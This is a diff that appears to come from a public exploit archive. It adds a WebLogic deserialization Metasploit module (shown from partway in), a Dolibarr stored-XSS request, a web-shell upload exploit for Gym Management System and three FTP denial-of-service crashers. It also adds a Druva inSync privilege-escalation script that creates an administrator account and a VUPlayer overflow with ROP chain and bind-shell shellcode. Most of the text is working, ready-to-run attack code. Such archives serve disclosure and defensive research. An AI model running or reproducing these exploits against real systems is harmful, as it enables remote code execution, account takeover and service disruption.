+    request_obj << '696d706c5469746c65' # implTitle
+    request_obj << '71007e0005' # TC_REFERENCE, handle
+    request_obj << '4c000a' # Field type: Object, field name length: 10
+    request_obj << '696d706c56656e646f72' # implVendor
+    request_obj << '71007e0005' # TC_REFERENCE, handle
+    request_obj << '4c000b' # Field type: Object, field name length: 11
+    request_obj << '696d706c56657273696f' # implVersion
+    request_obj << '6e'
+    request_obj << '71007e0005' # TC_REFERENCE, handle
+    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
+    request_obj << 'fe00ff' # separator
+    request_obj << 'fe010000'
+    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    request_obj << '0013' # Class name length: 19
+    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
+    request_obj << '6a766d2e4a564d4944'
+    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
+    request_obj << '0c0000'
+    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
+    request_obj << '4621'
+    request_obj << '000000000000000000'
+    request_obj << '09' # length: 9
+    request_obj << '3132372e302e312e31' # 127.0.1.1
+    request_obj << '000b' # length: 11
+    request_obj << '75732d6c2d627265656e' # us-l-breens
+    request_obj << '73'
+    request_obj << 'a53caff10000000700'
+    request_obj << '001b59'
+    request_obj << 'ffffffffffffffffffff'
+    request_obj << 'ffffffffffffffffffff'
+    request_obj << 'ffffffff'
+    request_obj << '0078'
+    request_obj << 'fe010000' # separator
+    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    request_obj << '0013' # Class name length: 19
+    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
+    request_obj << '6a766d2e4a564d4944'
+    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
+    request_obj << '0c0000'
+    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
+    request_obj << '1d0181401281'
+    request_obj << '34bf427600093132372e'
+    request_obj << '302e312e31a53caff1'
+    request_obj << '000000000078'
+
+    new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')
+    request_obj[0, 8] = new_len
+
+    sock.put([request_obj].pack('H*'))
+    sleep(1)
+  end
+
+  def format_payload(payload_cmd)
+    print_status('Formatting payload...')
+    payload_arr = payload_cmd.split(' ', 3)
+
+    formatted_payload = ''
+    payload_arr.each do |part|
+      formatted_payload << '74' # denotes a string
+      formatted_payload << part.length.to_s(16).rjust(4, '0')
+      formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
+    end
+
+    formatted_payload
+  end
+
+  def execute_command(cmd, _opts = {})
+    cmd.prepend('/bin/sh -c ')
+    cmd = build_payload_obj(cmd)
+
+    t3_send(cmd)
+  end
+end

exploits/php/webapps/48504.txt

@@ -0,0 +1,36 @@
+# Title: Dolibarr 11.0.3 - Persistent Cross-Site Scripting
+# Author: Mehmet Kelepce / Gais Cyber Security
+# Date : 2020-04-14
+# Vendor: https://www.dolibarr.org/
+# Exploit-DB Author ID: 8763
+# Remotely Exploitable: Yes
+# Dynamic Coding Language: PHP
+# CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)
+# Bug: XSS - Cross Site Scripting
+# CVE:
+## this vulnerability was found by examining the source code.
+
+PoC : Dolibarr 11.0.3 LDAP Synchronization Settings - HTTP POST REQUEST
+##########################################################
+POST /dolibarr/admin/ldap.php?action=setvalue HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/dolibarr/admin/ldap.php?action=test
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 723
+Connection: close
+Cookie: DOLSESSID_08b25d38fe3d8c5d83c5477f93783b26=abml2gjafuuqcos5lm1053tqu6; DOLINSTALLNOPING_b832abc1aadf61021c84b3def6cdf1e6=0
+Upgrade-Insecure-Requests: 1
+
+token=%242y%2410%245CjT4.D4w8Qe.uaL.pHuSeDOW9PB2gnNQ7MhYrYUt7W8hq2R3oXBe&activesynchro=0&activecontact=0&type=activedirectory&LDAP_SERVER_PROTOCOLVERSION=3&host=%22%3E%3CEMBED+SRC%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoJ0hlbGxvLCBEb2xpYmFyciEnKTs8L3NjcmlwdD48L3N2Zz4%3D%22+type%3D%22image%2Fsvg%2Bxml%22+AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E&slave=&port=389&dn=&usetls=0&admin=&pass=
+
+Vulnerable parameters: host,slave,port
+Payload (base64): PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoJ0hlbGxvLCBEb2xpYmFyciEnKTs8L3NjcmlwdD48L3N2Zz4=
+Payload (decode) : <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss"><script type="text/ecmascript">alert('Hello, Dolibarr!');</script></svg>
+
+Parameter file: /dolibarr/admin/ldap.php
+
+## Risk : cookie information of the target user is obtained.

exploits/php/webapps/48506.py

@@ -0,0 +1,103 @@
+# Exploit Title: Gym Management System 1.0 - Unauthenticated Remote Code Execution
+# Exploit Author: Bobby Cooke
+# Date: 2020-05-21
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+# Exploit Tested Using: Python 2.7.17
+# Vulnerability Description: 
+#   Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
+# Exploit Details:
+#   1. Access the '/upload.php' page, as it does not check for an authenticated user session.
+#   2. Set the 'id' parameter of the GET request to the desired file name for the uploaded PHP file.
+#     - `upload.php?id=kamehameha`
+#     /upload.php:
+#        4 $user = $_GET['id'];
+#       34       move_uploaded_file($_FILES["file"]["tmp_name"],
+#       35       "upload/". $user.".".$ext);
+#   3. Bypass the extension whitelist by adding a double extension, with the last one as an acceptable extension (png).
+#     /upload.php:
+#        5 $allowedExts = array("jpg", "jpeg", "gif", "png","JPG");
+#        6 $extension = @end(explode(".", $_FILES["file"]["name"]));
+#       14 && in_array($extension, $allowedExts))
+#   4. Bypass the file type check by modifying the 'Content-Type' of the 'file' parameter to 'image/png' in the POST request, and set the 'pupload' paramter to 'upload'.
+#        7 if(isset($_POST['pupload'])){
+#        8 if ((($_FILES["file"]["type"] == "image/gif")
+#       11 || ($_FILES["file"]["type"] == "image/png")
+#   5. In the body of the 'file' parameter of the POST request, insert the malicious PHP code:
+#       <?php echo shell_exec($_GET["telepathy"]); ?>
+#   6. The Web Application will rename the file to have the extension with the second item in an array created from the file name; seperated by the '.' character.
+#       30           $pic=$_FILES["file"]["name"];
+#       31             $conv=explode(".",$pic);
+#       32             $ext=$conv['1'];
+#   - Our uploaded file name was 'kaio-ken.php.png'. Therefor $conv['0']='kaio-ken'; $conv['1']='php'; $conv['2']='png'; 
+#   7. Communicate with the webshell at '/upload.php?id=kamehameha' using GET Requests with the telepathy parameter.
+
+import requests, sys, urllib, re
+from colorama import Fore, Back, Style
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def webshell(SERVER_URL, session):
+    try:
+        WEB_SHELL = SERVER_URL+'upload/kamehameha.php'
+        getdir  = {'telepathy': 'echo %CD%'}
+        r2 = session.get(WEB_SHELL, params=getdir, verify=False)
+        status = r2.status_code
+        if status != 200:
+            print Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL
+            r2.raise_for_status()
+        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
+        cwd = re.findall('[CDEF].*', r2.text)
+        cwd = cwd[0]+"> "
+        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
+        while True:
+            thought = raw_input(term)
+            command = {'telepathy': thought}
+            r2 = requests.get(WEB_SHELL, params=command, verify=False)
+            status = r2.status_code
+            if status != 200:
+                r2.raise_for_status()
+            response2 = r2.text
+            print(response2)
+    except:
+        print("\r\nExiting.")
+        sys.exit(-1)
+
+def formatHelp(STRING):
+    return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
+
+def header():
+    BL   = Style.BRIGHT+Fore.GREEN
+    RS   = Style.RESET_ALL
+    FR   = Fore.RESET
+    SIG  = BL+'            /\\\n'+RS
+    SIG += Fore.YELLOW+'/vvvvvvvvvvvv '+BL+'\\'+FR+'--------------------------------------,\n'
+    SIG += Fore.YELLOW+'`^^^^^^^^^^^^'+BL+' /'+FR+'============'+Fore.RED+'BOKU'+FR+'====================="\n'
+    SIG += BL+'            \/'+RS+'\n'
+    return SIG
+
+if __name__ == "__main__":
+    print header();
+    if len(sys.argv) != 2:
+        print formatHelp("(+) Usage:\t python %s <WEBAPP_URL>" % sys.argv[0])
+        print formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/gym/'" % sys.argv[0])
+        sys.exit(-1)
+    SERVER_URL = sys.argv[1]
+    UPLOAD_DIR = 'upload.php?id=kamehameha'
+    UPLOAD_URL = SERVER_URL + UPLOAD_DIR
+    s = requests.Session()
+    s.get(SERVER_URL, verify=False)
+    PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a'
+    png     = {
+                'file': 
+                  (
+                    'kaio-ken.php.png', 
+                    PNG_magicBytes+'\n'+'<?php echo shell_exec($_GET["telepathy"]); ?>', 
+                    'image/png', 
+                    {'Content-Disposition': 'form-data'}
+                  ) 
+              }
+    fdata   = {'pupload': 'upload'}
+    r1 = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
+    webshell(SERVER_URL, s)

exploits/windows/dos/48501.txt

@@ -0,0 +1,30 @@
+# Exploit Title: Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC) 
+# Date: 2020-05-16
+# Found by: Alvaro J. Gene (Socket_0x03)
+# Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
+# Vulnerable Application: Konica Minolta FTP Utility
+# Version: 1.0
+# Server: FTP Server
+# Vulnerable Command: LIST
+# Tested on: Windows 7 SP1
+
+# Impact: There is a buffer overflow vulnerability in the LIST command of the FTP server
+# "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, 
+# such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite 
+# some registers, an individual can use the vulnerable command to build a remote buffer 
+# overflow exploit that will root a system without any user interaction. 
+
+====================================================================================================
+=============== [ Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) ] ===============
+====================================================================================================
+
+
+from ftplib import FTP
+
+ftp = FTP('192.168.0.16')
+
+buffer = "A" * 1500
+
+ftp.login()
+
+ftp.retrlines('LIST ' + buffer)

exploits/windows/dos/48502.py

@@ -0,0 +1,30 @@
+# Exploit Title: Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC) 
+# Date: 2020-05-16
+# Found by: Alvaro J. Gene (Socket_0x03)
+# Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
+# Vulnerable Application: Konica Minolta FTP Utility
+# Version: 1.0
+# Server: FTP Server
+# Vulnerable Command: NLST
+# Tested on: Windows 7 SP1
+
+# Impact: There is a buffer overflow vulnerability in the NLST command of the FTP server
+# "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, 
+# such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite 
+# some registers, an individual can use the vulnerable command to build a remote buffer 
+# overflow exploit that will root a system without any user interaction. 
+
+====================================================================================================
+=============== [ Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC) ] ===============
+====================================================================================================
+
+
+from ftplib import FTP
+
+ftp = FTP('192.168.0.16')
+
+buffer = "A" * 1500
+
+ftp.login()
+
+ftp.retrlines('NLST ' + buffer)

exploits/windows/dos/48503.py

@@ -0,0 +1,42 @@
+# Exploit Title: Filetto 1.0 - 'FEAT' Denial of Service (PoC) 
+# Date: 2020-05-13
+# Found by: Alvaro J. Gene (Socket_0x03)
+# Vendor Homepage: http://www.utillyty.eu
+# Software Link: https://sourceforge.net/projects/filetto
+# Vulnerable Application: Filetto
+# Version: 1.0 (last version. Updated: 01/31/2020)
+# Server: FTP Server
+# Vulnerable Command: FEAT
+# Tested on: Windows 7 SP1
+
+
+====================================================================================================
+======================== [ Filetto v1.0 - 'FEAT' Denial of Service (PoC) ] =========================
+====================================================================================================
+
+
+from socket import *
+
+host = "192.168.0.14"
+port = 2021
+username = "Socket_0x03"
+password = "password"
+
+s = socket(AF_INET, SOCK_STREAM)
+s.connect((host, port))
+print s.recv(1024)
+
+s.send("USER %s\r\n" % (username))
+print s.recv(1024)
+
+s.send("PASS %s\r\n" % (password))
+print s.recv(1024)
+
+buffer = "FEAT "
+buffer += "\x41\x2c" * 11008
+buffer += "\r\n"
+
+s.send(buffer)
+print s.recv(1024)
+
+s.close()

exploits/windows/local/48505.txt

@@ -0,0 +1,58 @@
+# Exploit Title: Druva inSync Windows Client 6.6.3 - Local Privilege Escalation
+# Date: 2020-05-21
+# Exploit Author: Matteo Malvica
+# Credits: Chris Lyne for previous version's exploit 
+# Vendor Homepage: druva.com
+# Software Link: https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
+# Version: 6.6.3
+# Tested on: Windows 10 1909-18363.778
+# CVE: CVE-2020-5752
+# Command injection in inSyncCPHwnet64 RPC service
+# Runs as nt authority\system. so we have a local privilege escalation
+# The path validation has been only implemented through a 'strncmp' function which can be bypassed by
+# appending a directory traversal escape sequence at the end of the valid path.
+# Writeup: https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/ 
+
+# Example usage:
+#python insync.py "windows\system32\cmd.exe /C net user Leon /add"
+#python insync.py "windows\system32\cmd.exe /C net localgroup Administrators Leon /add"
+
+import socket
+import struct
+import sys
+
+if len(sys.argv) < 2:
+    print "Usage: " + __file__ + " <quoted command to execute>"
+    print "E.g. " + __file__ + " \"net user /add tenable\""
+    sys.exit(0)
+
+ip = '127.0.0.1'
+port = 6064
+command_line = 'C:\\ProgramData\\Druva\\inSync4\\..\\..\\..\\..\\..\\..\\..\\..\\' + sys.argv[1] 
+
+def make_wide(str):
+    new_str = ''
+    for c in str:
+        new_str += c
+        new_str += '\x00'
+    return new_str
+
+hello = "inSync PHC RPCW[v0002]"
+
+func_num = "\x05\x00\x00\x00"                                   # 05 is to run a command, passed as an agrument to CreateProcessW
+command_line = make_wide(command_line)                          # converts ascii to UTF-8
+command_length = struct.pack('<i', len(command_line))           # packed as little-endian integer
+requests = [ hello, func_num, command_length, command_line ]    # sends each request separately
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((ip, port))
+
+i = 1
+for req in requests:
+    print 'Sending request' + str(i)
+    sock.send(req)
+    i += 1
+
+sock.close()
+
+print "Done."

exploits/windows/local/48507.py

@@ -0,0 +1,85 @@
+# Exploit title: VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP,ASLR)
+# Date: 2020-05-22
+# Exploit Author: Gobinathan L
+# Vendor Homepage: http://www.vuplayer.com/
+# Version: v2.49
+# Tested on: Windows 7 Professional with ALSR and Full DEP Turned ON.
+
+# Usage             : $ python <exploit>.py 
+
+#===================================[ VUPlayer 2.49 Exploit Generator ]======================================#
+
+import struct
+
+# msfvenom -p windows/shell_bind_tcp exitfunc=thread -b "\x00\x0a\x0d\x1a" -f c
+shell = ("\xd9\xc9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x53\xbd\xa9\xc1\xbf"
+"\xb1\x83\xc2\x04\x31\x6a\x13\x03\xc3\xd2\x5d\x44\xef\x3d\x23"
+"\xa7\x0f\xbe\x44\x21\xea\x8f\x44\x55\x7f\xbf\x74\x1d\x2d\x4c"
+"\xfe\x73\xc5\xc7\x72\x5c\xea\x60\x38\xba\xc5\x71\x11\xfe\x44"
+"\xf2\x68\xd3\xa6\xcb\xa2\x26\xa7\x0c\xde\xcb\xf5\xc5\x94\x7e"
+"\xe9\x62\xe0\x42\x82\x39\xe4\xc2\x77\x89\x07\xe2\x26\x81\x51"
+"\x24\xc9\x46\xea\x6d\xd1\x8b\xd7\x24\x6a\x7f\xa3\xb6\xba\xb1"
+"\x4c\x14\x83\x7d\xbf\x64\xc4\xba\x20\x13\x3c\xb9\xdd\x24\xfb"
+"\xc3\x39\xa0\x1f\x63\xc9\x12\xfb\x95\x1e\xc4\x88\x9a\xeb\x82"
+"\xd6\xbe\xea\x47\x6d\xba\x67\x66\xa1\x4a\x33\x4d\x65\x16\xe7"
+"\xec\x3c\xf2\x46\x10\x5e\x5d\x36\xb4\x15\x70\x23\xc5\x74\x1d"
+"\x80\xe4\x86\xdd\x8e\x7f\xf5\xef\x11\xd4\x91\x43\xd9\xf2\x66"
+"\xa3\xf0\x43\xf8\x5a\xfb\xb3\xd1\x98\xaf\xe3\x49\x08\xd0\x6f"
+"\x89\xb5\x05\x05\x81\x10\xf6\x38\x6c\xe2\xa6\xfc\xde\x8b\xac"
+"\xf2\x01\xab\xce\xd8\x2a\x44\x33\xe3\x45\xc9\xba\x05\x0f\xe1"
+"\xea\x9e\xa7\xc3\xc8\x16\x50\x3b\x3b\x0f\xf6\x74\x2d\x88\xf9"
+"\x84\x7b\xbe\x6d\x0f\x68\x7a\x8c\x10\xa5\x2a\xd9\x87\x33\xbb"
+"\xa8\x36\x43\x96\x5a\xda\xd6\x7d\x9a\x95\xca\x29\xcd\xf2\x3d"
+"\x20\x9b\xee\x64\x9a\xb9\xf2\xf1\xe5\x79\x29\xc2\xe8\x80\xbc"
+"\x7e\xcf\x92\x78\x7e\x4b\xc6\xd4\x29\x05\xb0\x92\x83\xe7\x6a"
+"\x4d\x7f\xae\xfa\x08\xb3\x71\x7c\x15\x9e\x07\x60\xa4\x77\x5e"
+"\x9f\x09\x10\x56\xd8\x77\x80\x99\x33\x3c\xa0\x7b\x91\x49\x49"
+"\x22\x70\xf0\x14\xd5\xaf\x37\x21\x56\x45\xc8\xd6\x46\x2c\xcd"
+"\x93\xc0\xdd\xbf\x8c\xa4\xe1\x6c\xac\xec")
+
+ret     = struct.pack("<I", 0x10010158)
+
+def create_rop_chain():
+
+    rop_gadgets = [
+      0x100106e1,    #POP EBP RET
+      0x100106e1,    #Ptr to POP EBP RET popped into EBP
+      0x10015f82,    #POP EAX RET
+      0xfffffdff,    #Value to Negate.. result in 0x201
+      0x10014db4,    #NEG EAX RET
+      0x10032f72,    #XCHG EAX, EBX RET
+      0x10015f82,    #POP EAX RET
+      0xffffffc0,    #Value to negate ..result in 0x40
+      0x10014db4,    #NEG EAX RET
+      0x10038a6d,    #XCHG EAX, EDX RET
+      0x106053e5,    #POP ECX RET      
+      0x101082cc,    #Random Location with Write Access
+      0x1001621c,    #POP EDI RET
+      0x10010158,    #RET will be stored in EDI
+      0x10604154,    #POP ESI RET
+      0x10101c02,    #JMP [EAX]
+      0x10015f77,    # POP EAX # RETN [BASS.dll] 
+      0x10109270,    # ptr to &VirtualProtect() [IAT BASSWMA.dll]
+      0x1001d7a5,    # PUSHAD # RETN
+      0x10022aa7,    # JMP ESP
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+rop_chain = create_rop_chain()
+shellcode = "\x90"*32 + shell
+
+
+buffer = "A"*1012
+buffer+= ret
+buffer+= rop_chain
+buffer+= shellcode
+buffer+= "\x90"*(2500 - len(buffer))
+
+try:
+    f = open("exploit.m3u", "w")
+    f.write(buffer)
+    print("[+] Payload Generated Successfully.")
+    print("[+] Check for Open Port [4444] on Target Machine. A Bind shell is waiting for you..")
+    f.close()
+except:
+    print("[-] Couldn't Generate Payload.")

files_exploits.csv

@@ -6733,6 +6733,9 @@ id,file,description,date,author,type,platform,port
 48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows,
 48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware,
 48493,exploits/windows/dos/48493.py,"AbsoluteTelnet 11.21 - 'Username' Denial of Service (PoC)",2020-05-21,"Xenofon Vassilakopoulos",dos,windows,
+48501,exploits/windows/dos/48501.txt,"Konica Minolta FTP Utility 1.0 - 'LIST' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
+48502,exploits/windows/dos/48502.py,"Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
+48503,exploits/windows/dos/48503.py,"Filetto 1.0 - 'FEAT' Denial of Service (PoC)",2020-05-22,Socket_0x03,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11076,6 +11079,8 @@ id,file,description,date,author,type,platform,port
 48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
 48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
 48499,exploits/windows/local/48499.txt,"CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)",2020-05-21,"Xenofon Vassilakopoulos",local,windows,
+48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows,
+48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18151,6 +18156,7 @@ id,file,description,date,author,type,platform,port
 48421,exploits/multiple/remote/48421.txt,"Saltstack 3000.1 - Remote Code Execution",2020-05-05,"Jasper Lievisse Adriaanse",remote,multiple,
 48483,exploits/multiple/remote/48483.txt,"HP LinuxKI 6.01 - Remote Command Injection",2020-05-18,"Cody Winkler",remote,multiple,
 48491,exploits/php/remote/48491.rb,"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)",2020-05-19,Metasploit,remote,php,
+48508,exploits/multiple/remote/48508.rb,"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)",2020-05-22,Metasploit,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42728,3 +42734,5 @@ id,file,description,date,author,type,platform,port
 48496,exploits/php/webapps/48496.txt,"Composr CMS 10.0.30 - Persistent Cross-Site Scripting",2020-05-21,"Manuel García Cárdenas",webapps,php,
 48497,exploits/php/webapps/48497.txt,"PHPFusion 9.03.50 - Persistent Cross-Site Scripting",2020-05-21,coiffeur,webapps,php,
 48500,exploits/multiple/webapps/48500.txt,"OpenEDX platform Ironwood 2.5 - Remote Code Execution",2020-05-21,"Daniel Monzón",webapps,multiple,
+48504,exploits/php/webapps/48504.txt,"Dolibarr 11.0.3 - Persistent Cross-Site Scripting",2020-05-22,"Mehmet Kelepçe",webapps,php,
+48506,exploits/php/webapps/48506.py,"Gym Management System 1.0 - Unauthenticated Remote Code Execution",2020-05-22,boku,webapps,php,